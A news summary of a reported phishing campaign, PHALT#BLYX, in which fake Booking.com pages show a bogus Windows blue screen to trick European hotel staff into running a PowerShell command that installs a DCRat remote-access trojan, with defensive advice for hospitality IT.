Fake Windows BSODs check in at Europe’s hotels to con staff into running malware

Steven

Fake Windows BSODs check in at Europe’s hotels to con staff into running malware

Summary

Security researchers at Securonix have been tracking PHALT#BLYX, a social-engineering campaign that targets hotels and other hospitality organisations across Europe. Attackers send Booking.com-themed phishing emails about unexpected euro charges; the link leads to a believable Booking.com page that then displays a full-screen fake Windows Blue Screen of Death (BSOD).

The fake crash panics staff into following instructions that require them to paste and run a PowerShell command. Because the victim executes the command manually, the infection bypasses many automated defences. The payload is delivered via legitimate Windows tooling (now using MSBuild-based execution) and installs a remote-access trojan from the DCRat family, giving attackers persistent access to compromised machines.

Key Points

  • Campaign labelled PHALT#BLYX targets hospitality workers with Booking.com-style phishing about euro charges.
  • Attack uses a convincing fake full-screen Windows BSOD to induce panic and trick staff into running commands.
  • Manual execution by staff (ClickFix variant) lets the attack sidestep many automated security controls.
  • Adversaries moved to MSBuild-based execution and living-off-the-land techniques to evade antivirus detection.
  • The final payload is a remote access trojan (DCRat family) that enables spying and further malware delivery.
  • Artefacts in the attack chain show Russian-language indicators and tooling commonly traded on Russian underground forums.

Context and Relevance

This is important for anyone responsible for hospitality IT or front-of-house systems: reception and booking workstations are attractive targets because staff handle reservations, payments and guest data. The campaign exemplifies a wider trend of socially engineered attacks that combine panic-inducing lures with living-off-the-land techniques to bypass defences. Organisations should update staff training, restrict capability to run unsigned scripts, and monitor for unusual MSBuild or PowerShell activity.

Why should I read this?

Short and blunt: because your receptionist might be tricked into launching a RAT by what looks like a Booking.com error. It’s a neat, panic-first trick that lets attackers piggyback on everyday Windows tools — so if you care about guest data, bookings or payments, this is exactly the type of attack you want to know about now.

Author style

Punchy: this is the kind of social-hack that works because it scares people into acting. Read the detail — the technique is evolving, it bypasses standard controls, and the consequences for hospitality operations can be immediate.

Source

Source: https://go.theregister.com/feed/www.theregister.com/2026/01/06/russia_hackers_hotel_bsods/